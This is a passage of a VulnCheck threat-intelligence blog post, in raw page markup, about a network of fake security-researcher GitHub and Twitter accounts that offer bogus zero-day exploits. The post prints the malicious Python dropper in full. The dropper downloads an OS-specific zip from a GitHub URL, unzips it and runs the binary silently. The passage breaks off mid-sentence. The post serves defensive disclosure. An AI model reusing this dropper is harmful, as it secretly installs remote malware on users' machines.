width="1em" height="1em" viewBox="0 0 24 24" data-v-f172b434><path fill="currentColor" d="M16.5 17.5v2q0 .2.15.35T17 20q.2 0 .35-.15t.15-.35v-2h2q.2 0 .35-.15T20 17q0-.2-.15-.35t-.35-.15h-2v-2q0-.2-.15-.35T17 14q-.2 0-.35.15t-.15.35v2h-2q-.2 0-.35.15T14 17q0 .2.15.35t.35.15h2ZM17 22q-2.075 0-3.538-1.463T12 17q0-2.075 1.463-3.538T17 12q2.075 0 3.538 1.463T22 17q0 2.075-1.463 3.538T17 22Zm-5 0q-3.475-.875-5.738-3.988T4 11.1V6.375q0-.625.363-1.125t.937-.725l6-2.25q.35-.125.7-.125t.7.125l6 2.25q.575.225.938.725T20 6.375v4.3q-.65-.325-1.463-.5T17 10q-2.9 0-4.95 2.05T10 17q0 1.55.588 2.8t1.487 2.175q-.025 0-.037.013T12 22Z"/></svg><span>Report a Vulnerability</span></a></li><!--]--></ul><!--]--></div><div class="px-4"><!--[--><div class="font-semibold text-gray-600 dark:text-gray-400 mb-2 mt-8 md:mt-0">Legal</div><ul><!--[--><li><a href="/privacy" class="my-0.5 py-0.5 flex items-center space-x-2 text-gray-500 dark:text-gray-600 hover:text-gray-800 dark:hover:text-gray-200 transition-colors duration-200"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon w-4 h-4" style="" width="1em" height="1em" viewBox="0 0 32 32" data-v-f172b434><path fill="currentColor" d="M30 15a6 6 0 1 0-10 4.46V29l4-1.884L28 29v-9.54A5.98 5.98 0 0 0 30 15Zm-4 10.848l-2-.942l-2 .942V20.65a5.888 5.888 0 0 0 4 0ZM24 19a4 4 0 1 1 4-4a4.005 4.005 0 0 1-4 4Z"/><path fill="currentColor" d="M14 2a6.007 6.007 0 0 0-6 6v6H6a2.002 2.002 0 0 0-2 2v12a2.002 2.002 0 0 0 2 2h11v-2H6V16h9v-2h-5V8a4 4 0 0 1 7.92-.8l1.96-.4A6.017 6.017 0 0 0 14 2Z"/></svg><span>Privacy Policy</span></a></li><li><a href="/terms" class="my-0.5 py-0.5 flex items-center space-x-2 text-gray-500 dark:text-gray-600 hover:text-gray-800 dark:hover:text-gray-200 transition-colors duration-200"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon w-4 h-4" style="" width="1em" height="1em" viewBox="0 0 32 32" data-v-f172b434><path fill="currentColor" d="M30 18a6 6 0 1 0-10 4.46V30l4-1.893L28 30v-7.54A5.98 5.98 0 0 0 30 18zm-4 8.84l-2-.947l-2 .947v-3.19a5.888 5.888 0 0 0 4 0zM24 22a4 4 0 1 1 4-4a4.005 4.005 0 0 1-4 4zM9 14h7v2H9zm0-6h10v2H9z"/><path fill="currentColor" d="M6 30a2.002 2.002 0 0 1-2-2V4a2.002 2.002 0 0 1 2-2h16a2.002 2.002 0 0 1 2 2v4h-2V4H6v24h10v2Z"/></svg><span>Terms &amp; Conditions</span></a></li><li><a href="/vulnerability-disclosure-policy" class="my-0.5 py-0.5 flex items-center space-x-2 text-gray-500 dark:text-gray-600 hover:text-gray-800 dark:hover:text-gray-200 transition-colors duration-200"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon w-4 h-4" style="" width="1em" height="1em" viewBox="0 0 48 48" data-v-f172b434><g fill="none" stroke="currentColor" stroke-linecap="round" stroke-width="4"><rect width="32" height="40" x="8" y="4" stroke-linejoin="round" rx="2"/><path stroke-linejoin="round" d="M16 4h9v16l-4.5-4l-4.5 4V4Z"/><path d="M16 28h10m-10 6h16"/></g></svg><span>Vulnerability Disclosure Policy</span></a></li><!--]--></ul><!--]--></div></div><!--]--></div></footer></div><!--]--><!----><div class="fixed flex flex-col justify-end z-[55] lg:top-0 lg:right-0 w-full sm:w-96"><!----></div></div></div><script>window.__NUXT__=(function(a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z,_,$,aa,ab,ac,ad,ae,af,ag,ah,ai,aj,ak,al,am,an,ao,ap,aq,ar,as,at,au,av,aw,ax,ay,az,aA,aB,aC,aD,aE,aF,aG,aH,aI,aJ,aK){return {data:{"content-query-C5tE1t07Tq":{_path:"\u002Fblog\u002Ffake-repos-deliver-malicious-implant",_dir:P,_draft:f,_partial:f,_locale:r,_empty:f,title:"Fake Security Researcher GitHub Repositories Deliver Malicious Implant - Blog - VulnCheck",description:"VulnCheck discovers a network of fake security researcher accounts promoting hidden malware.",type:P,slug:"fake-repos-deliver-malicious-implant",blogtitle:"Fake Security Researcher GitHub Repositories Deliver Malicious Implant",date:"2023-06-14T00:00:00.000Z",image:"blog\u002Ffake-repos-deliver-malicious-implant.png",author:{name:"Jacob Baines",avatar:"https:\u002F\u002Fca.slack-edge.com\u002FT02P16KHNRY-U03S81HQS1J-19e0ae9f7b3c-512",link:"https:\u002F\u002Ftwitter.com\u002FJunior_Baines",linkName:"@Junior_Baines"},body:{type:"root",children:[{type:a,tag:"check-list",props:{":list":"[\"In early May, VulnCheck came across a malicious GitHub repository that claimed to be a Signal 0-day. The team reported the repository to GitHub, and it was quickly taken down. The same scenario continued throughout May.\",\"Recently, the individuals creating these repositories have put significant effort into making them look legitimate by creating a network of accounts and Twitter profiles, pretending to be part of a non-existent company called High Sierra Cyber Security, and even using headshots of legitimate security researchers from companies like Rapid7.\",\"Each High Sierra Cyber Security account contains a malicious repository claiming to be an exploit for a well-known product, including Chrome, Exchange, Discord, and more. Some of the accounts even advertise their “findings” on Twitter.\",\"Security researchers should understand that they are useful targets for malicious actors and should be careful when downloading code from GitHub. Always review the code you are executing, and don’t use anything you don’t understand.\"]",ico:"mdi:check-bold",title:"Key Takeaways"},children:[]},{type:a,tag:p,props:{},children:[{type:b,value:"As part of VulnCheck’s "},{type:a,tag:l,props:{href:"https:\u002F\u002Fvulncheck.com\u002Fproduct\u002Fexploit-intelligence",rel:[m]},children:[{type:b,value:"Exploit Intelligence"}]},{type:b,value:" offering, we monitor and review large amounts of GitHub repositories. The review process exists to filter out useless, malicious, and\u002For scam repositories. In early May, during routine reviews, we came across an obviously malicious GitHub "},{type:a,tag:l,props:{href:"https:\u002F\u002Fgithub.com\u002Fresearchkendra91\u002Fsignal-zeroday-exploit",rel:[m]},children:[{type:b,value:"repository"}]},{type:b,value:" that claimed to be a Signal 0-day. We reported the repository to GitHub, and it was quickly taken down."}]},{type:a,tag:p,props:{},children:[{type:b,value:"The very next day, an almost identical repository was created under a different account, but this time claiming to be a "},{type:a,tag:l,props:{href:"https:\u002F\u002Fgithub.com\u002Fdarthvander20\u002Fwhatsapp-zero-day-exploit\u002Fblob\u002Fmain\u002Fpoc.py",rel:[m]},children:[{type:b,value:"WhatsApp zero-day"}]},{type:b,value:". Again, we worked with GitHub to get the repository taken down. This process kept repeating itself throughout May."}]},{type:a,tag:p,props:{},children:[{type:b,value:"More recently, however, the individual(s) creating these repositories have put more effort into making them look legitimate by creating a network of accounts. The attacker has created half a dozen GitHub accounts and a handful of associated Twitter accounts. The accounts all pretend to be part of a non-existent security company called High Sierra Cyber Security. Below is an example of one such account:"}]},{type:a,tag:p,props:{},children:[{type:a,tag:A,props:{alt:"GSanderson",src:"\u002Fblog\u002Ffake-repos-deliver-malicious-implant\u002Fsanderson.png"},children:[]}]},{type:a,tag:p,props:{},children:[{type:b,value:"The profile looks like a normal security researcher account. The account has a headshot, followers, an associated organization, a Twitter handle, and a (dead) link to the company’s website. However, we recognized “Andrei Kuzman” was using a headshot of a "},{type:a,tag:l,props:{href:"https:\u002F\u002Fwww.rapid7.com\u002Fglobalassets\u002F_images\u002Fpeople\u002Fcurt-barnard1.png",rel:[m]},children:[{type:b,value:"Rapid7 employee"}]},{type:b,value:". So it appears the attacker is not only making efforts to make the profiles look legitimate, but also using headshots of actual security researchers."}]},{type:a,tag:p,props:{},children:[{type:b,value:"Each High Sierra Cyber Security account contains a malicious repository claiming to be an exploit for a well-known product: Chrome, Exchange, Discord, etc. Some of the accounts even advertise their “findings” on Twitter:"}]},{type:a,tag:p,props:{},children:[{type:a,tag:A,props:{alt:"Kuzman",src:"\u002Fblog\u002Ffake-repos-deliver-malicious-implant\u002Fkuzman.png"},children:[]}]},{type:a,tag:p,props:{},children:[{type:b,value:"The repositories all follow a very simple formula. They all look like the following image (including tagging of “hot” CVE to attract victims):"}]},{type:a,tag:p,props:{},children:[{type:a,tag:A,props:{alt:Q,src:"\u002Fblog\u002Ffake-repos-deliver-malicious-implant\u002Flayout.png"},children:[]}]},{type:a,tag:p,props:{},children:[{type:a,tag:B,props:{},children:[{type:b,value:R}]},{type:b,value:" contains the code to download a malicious binary, and then execute it. The python script will download a different payload depending on the victim’s host operating system. The above Discord “0-day” uses the following code to perform these actions:"}]},{type:a,tag:S,props:{className:["language-python"],code:"if __name__ == '__main__':\n    if os.name == 'nt':\n        try:\n            namezip = \"cveswindows.zip\"\n            name    = \"cveswindows\"\n            url = \"https:\u002F\u002Fgithub.com\u002FGSandersonHSCS\u002Fdiscord-0-day-fix\u002Fraw\u002Fmain\u002Fgitignore\u002Fcveswindows.zip\"\n            des = os.path.join(os.environ['TMP'], namezip)\n            if not os.path.exists(os.path.join(os.environ['TMP'], name, name + \".exe\")):\n                urllib.request.urlretrieve(url, des)\n                with open(des, 'wb') as f: f.write(urllib.request.urlopen(url).read())\n                zf = ZipFile(des, 'r')\n                zf.extractall(os.path.join(os.environ['TMP'], name))\n                zf.close()\n                pid = subprocess.Popen([os.path.join(os.environ['TMP'], name, name + \".exe\")], creationflags=0x00000008 | subprocess.CREATE_NO_WINDOW).pid\n        except:\n            pass\n    else:\n        url = \"https:\u002F\u002Fgithub.com\u002FGSandersonHSCS\u002Fdiscord-0-day-fix\u002Fraw\u002Fmain\u002Fgitignore\u002Fcveslinux.zip\"\n        namezip = \"cveslinux.zip\"\n        name    = \"cveslinux\"\n\n        des = os.path.join(\"\u002Fhome\u002F\" + os.environ[\"USERNAME\"] + \"\u002F.local\u002Fshare\", namezip)\n        if not os.path.exists(os.path.join(\"\u002Fhome\u002F\" + os.environ[\"USERNAME\"] + \"\u002F.local\u002Fshare\", name, name)):\n            urllib.request.urlretrieve(url, des)\n            with open(des, 'wb') as f: f.write(urllib.request.urlopen(url).read())\n            zf = ZipFile(des, 'r')\n            zf.extractall(os.path.join(\"\u002Fhome\u002F\" + os.environ[\"USERNAME\"] + \"\u002F.local\u002Fshare\", name))\n            zf.close()\n            st = os.stat(os.path.join(\"\u002Fhome\u002F\" + os.environ[\"USERNAME\"] + \"\u002F.local\u002Fshare\", name, name))\n            os.chmod(os.path.join(\"\u002Fhome\u002F\" + os.environ[\"USERNAME\"] + \"\u002F.local\u002Fshare\", name, name), st.st_mode | stat.S_IEXEC)\n            subprocess.Popen([\"\u002Fbin\u002Fbash\", \"-c\", os.path.join(\"\u002Fhome\u002F\" + os.environ[\"USERNAME\"] + \"\u002F.local\u002Fshare\", name, name)], start_new_session=True, stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT)\n\n\n    main()\n",language:T,meta:r},children:[{type:a,tag:"pre",props:{},children:[{type:a,tag:S,props:{__ignoreMap:r},children:[{type:a,tag:c,props:{class:j,line:U},children:[{type:a,tag:c,props:{class:g},children:[{type:b,value:C}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:"ct-869604"},children:[{type:b,value:"__name__"}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:V}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:"'__main__'"}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:y}]}]},{type:a,tag:c,props:{class:j,line:H},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:W}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:C}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:" os.name "}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:V}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:"'nt'"}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:y}]}]},{type:a,tag:c,props:{class:j,line:D},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:I}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:"try"}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:y}]}]},{type:a,tag:c,props:{class:j,line:X},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:"            namezip "}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:o}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:"\"cveswindows.zip\"\n"}]}]},{type:a,tag:c,props:{class:j,line:5},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:"            name    "}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:o}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:"\"cveswindows\"\n"}]}]},{type:a,tag:c,props:{class:j,line:6},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:"            url "}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:o}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:"\"https:\u002F\u002Fgithub.com\u002FGSandersonHSCS\u002Fdiscord-0-day-fix\u002Fraw\u002Fmain\u002Fgitignore\u002Fcveswindows.zip\"\n"}]}]},{type:a,tag:c,props:{class:j,line:7},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:"            des "}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:o}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:" os.path.join(os.environ["}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:E}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:"], namezip)\n"}]}]},{type:a,tag:c,props:{class:j,line:8},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:J}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:C}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:Y}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:" os.path.exists(os.path.join(os.environ["}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:E}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:Z}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:q}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:_}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:")):\n"}]}]},{type:a,tag:c,props:{class:j,line:9},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:"                urllib.request.urlretrieve(url, des)\n"}]}]},{type:a,tag:c,props:{class:j,line:10},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:"                "}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:$}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:aa},children:[{type:b,value:ab}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:ac}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:ad}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:ae}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:af}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:ag}]}]},{type:a,tag:c,props:{class:j,line:11},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:"                zf "}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:o}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:ah}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:ai}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:F}]}]},{type:a,tag:c,props:{class:j,line:12},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:"                zf.extractall(os.path.join(os.environ["}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:E}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:"], name))\n"}]}]},{type:a,tag:c,props:{class:j,line:13},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:"                zf.close()\n"}]}]},{type:a,tag:c,props:{class:j,line:14},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:"                pid "}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:o}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:" subprocess.Popen([os.path.join(os.environ["}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:E}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:Z}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:q}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:_}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:")], "}]},{type:a,tag:c,props:{class:G},children:[{type:b,value:"creationflags"}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:o}]},{type:a,tag:c,props:{class:"ct-854774"},children:[{type:b,value:"0x"}]},{type:a,tag:c,props:{class:s},children:[{type:b,value:"00000008"}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:aj}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:" subprocess."}]},{type:a,tag:c,props:{class:s},children:[{type:b,value:"CREATE_NO_WINDOW"}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:").pid\n"}]}]},{type:a,tag:c,props:{class:j,line:15},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:I}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:"except"}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:y}]}]},{type:a,tag:c,props:{class:j,line:16},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:J}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:"pass\n"}]}]},{type:a,tag:c,props:{class:j,line:17},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:W}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:"else"}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:y}]}]},{type:a,tag:c,props:{class:j,line:18},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:"        url "}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:o}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:"\"https:\u002F\u002Fgithub.com\u002FGSandersonHSCS\u002Fdiscord-0-day-fix\u002Fraw\u002Fmain\u002Fgitignore\u002Fcveslinux.zip\"\n"}]}]},{type:a,tag:c,props:{class:j,line:19},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:"        namezip "}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:o}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:"\"cveslinux.zip\"\n"}]}]},{type:a,tag:c,props:{class:j,line:20},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:"        name    "}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:o}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:"\"cveslinux\"\n"}]}]},{type:a,tag:c,props:{class:j,line:21},children:[{type:a,tag:c,props:{},children:[{type:b,value:K}]}]},{type:a,tag:c,props:{class:j,line:22},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:"        des "}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:o}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:" os.path.join("}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:t}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:q}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:u}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:v}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:w}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:q}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:x}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:", namezip)\n"}]}]},{type:a,tag:c,props:{class:j,line:23},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:I}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:C}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:Y}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:" os.path.exists(os.path.join("}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:t}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:q}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:u}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:v}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:w}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:q}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:x}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:", name, name)):\n"}]}]},{type:a,tag:c,props:{class:j,line:i},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:"            urllib.request.urlretrieve(url, des)\n"}]}]},{type:a,tag:c,props:{class:j,line:25},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:J}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:$}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:aa},children:[{type:b,value:ab}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:ac}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:ad}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:ae}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:af}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:ag}]}]},{type:a,tag:c,props:{class:j,line:26},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:"            zf "}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:o}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:ah}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:ai}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:F}]}]},{type:a,tag:c,props:{class:j,line:27},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:"            zf.extractall(os.path.join("}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:t}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:q}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:u}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:v}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:w}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:q}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:x}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:", name))\n"}]}]},{type:a,tag:c,props:{class:j,line:28},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:"            zf.close()\n"}]}]},{type:a,tag:c,props:{class:j,line:29},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:"            st "}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:o}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:" os.stat(os.path.join("}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:t}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:q}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:u}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:v}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:w}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:q}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:x}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:", name, name))\n"}]}]},{type:a,tag:c,props:{class:j,line:30},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:"            os.chmod(os.path.join("}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:t}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:q}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:u}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:v}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:w}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:q}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:x}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:", name, name), st.st_mode "}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:aj}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:" stat."}]},{type:a,tag:c,props:{class:s},children:[{type:b,value:"S_IEXEC"}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:F}]}]},{type:a,tag:c,props:{class:j,line:31},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:"            subprocess.Popen(["}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:"\"\u002Fbin\u002Fbash\""}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:L}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:"\"-c\""}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:", os.path.join("}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:t}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:q}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:u}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:v}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:w}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:q}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:x}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:", name, name)], "}]},{type:a,tag:c,props:{class:G},children:[{type:b,value:"start_new_session"}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:o}]},{type:a,tag:c,props:{class:s},children:[{type:b,value:"True"}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:L}]},{type:a,tag:c,props:{class:G},children:[{type:b,value:"stdout"}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:o}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:ak}]},{type:a,tag:c,props:{class:s},children:[{type:b,value:"DEVNULL"}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:L}]},{type:a,tag:c,props:{class:G},children:[{type:b,value:"stderr"}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:o}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:ak}]},{type:a,tag:c,props:{class:s},children:[{type:b,value:"STDOUT"}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:F}]}]},{type:a,tag:c,props:{class:j,line:z},children:[{type:a,tag:c,props:{},children:[{type:b,value:K}]}]},{type:a,tag:c,props:{class:j,line:33},children:[{type:a,tag:c,props:{},children:[{type:b,value:K}]}]},{type:a,tag:c,props:{class:j,line:34},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:"    main()"}]}]}]}]}]},{type:a,tag:p,props:{},children:[{type:b,value:"Above, "},{type:a,tag:B,props:{},children:[{type:b,value:R}]},{type:b,value:" downloads one of two zip files. "},{type:a,tag:B,props:{},children:[{type:b,value:"cveslinux.zip"}]},{type:b,value:" or "},{type:a,tag:B,props:{},children:[{type:b,value:"cveswindows.zip"}]},{type:b,value:" are fetched from GitHub, unzipped, written to disk, and executed. The Windows binary has a very high detection rate on VirusTotal ("},{type:a,tag:l,props:{href:"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002F777c9220670025a487f4e853987df0482fbd545189137d58a60d4ab37c1cfbb4",rel:[m]},children:[{type:b,value:"43\u002F71"}]},{type:b,value:"). The Linux binary much less so ("},{type:a,tag:l,props:{href:"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002Fba4be87b3747e6c009c3aa9c9f28ce4331cd3fe2bd0d332283f226d747698733\u002Fdetection",rel:[m]},children:[{type:b,value:"3\u002F62"}]},{type:b,value:"), but it contains some very obvious strings indicating its nature."}]},{type:a,tag:p,props:{},children:[{type:a,tag:A,props:{alt:Q,src:"\u002Fblog\u002Ffake-repos-deliver-malicious-implant\u002Fghidra.png"},children:[]}]},{type:a,tag:p,props:{},children:[{type:b,value:"The attacker has made a lot of effort to create all these fake personas, only to deliver very obvious malware. It’s unclear if they have been successful, but given that they’ve continued to pursue this avenue of attacks, it seems they believe they "},{type:a,tag:"em",props:{},children:[{type:b,value:"will"}]},{type:b,value:" be successful."}]},{type:a,tag:p,props:{},children:[{type:b,value:"It isn’t clear if this is a single individual with too much time on their hands, or something more advanced like the campaign uncovered by 